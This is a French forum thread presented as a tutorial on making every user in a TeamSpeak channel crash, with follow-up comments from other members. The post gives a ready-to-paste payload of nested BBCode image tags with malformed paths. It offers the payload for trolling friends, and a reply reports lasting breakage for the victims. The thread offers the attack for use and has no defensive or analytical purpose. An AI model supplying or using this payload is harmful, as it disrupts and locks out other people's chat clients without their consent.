Comment faire crasher tous les utilisateurs d'un Teamspeak[TUTO]

• Auteur de la discussion Auteur de la discussion Chuk
  • Créé le Créé le

Chuk

Premium
Réactions
696
RGCoins
0
Salut , donc je vien de trouvé une astuce pour faire buggé tous les utilisateurs d'un teamspeak.
Donc , vous envoyez le code ci-dessous dans votre channel ( çela feras crash tous les gens dans le channel ).
Code:
[img][img]//E|/\[/img][/img][img][img]//$Q/2[/img][/img][img][img]//Uv/![/img][/img][img][img]//Ut/1[/img][/img][img][img]//>`/>[/img][/img][img][img]//4]/N[/img][/img][img][img]//U@/y[/img][/img][img][img]//LP/F[/img][/img][img][img]//rx/I[/img][/img][img][img]//Sy/"[/img][/img][img][img]//10/)[/img][/img][img][img]//gC/d[/img][/img][img][img]//q\/a[/img][/img][img][img]//[N/,[/img][/img][img][img]//U}/d[/img][/img][img][img]//R//E[/img][/img][img][img]//3h/4[/img][/img][img][img]//1N/P[/img][/img][img][img]//ox/G[/img][/img][img][img]//Z7/t[/img][/img][img][img]//da/H[/img][/img][img][img]//7w/1[/img][/img][img][img]//qj/Q[/img][/img][img][img]//{B/Y[/img][/img][img][img]//%6/![/img][/img][img][img]//]F/W[/img][/img][img][img]//]^/G[/img][/img][img][img]//8\/^[/img][/img][img][img]//$Q/{[/img][/img][img][img]//En/h[/img][/img]

Voilà , c'est tout c'est simple et efficace et bien pour troll des amis ;)

Dernière édition par un modérateur:
Quel code ? :mmh:

Quel code X) :crazy:D:

Tu devrais renommer ton tutoriel en <comment faire chier le monde>

Sa fait crash tout le serv où les gens du channel?

Help please, bon je l'ai fais pour rigoler mais mes amis ont des gros problème et sont bugué comment je pourrais faire?

Help, désolé de spam, quand il se co ils peuvent plus rien faire.

Bon faite gaffe quand vous utilisez ce code, car vous serez affectez aussi et donc vous aurez des perma lag

mdr marrant

Ptdrr, cool à faire. (:

Retour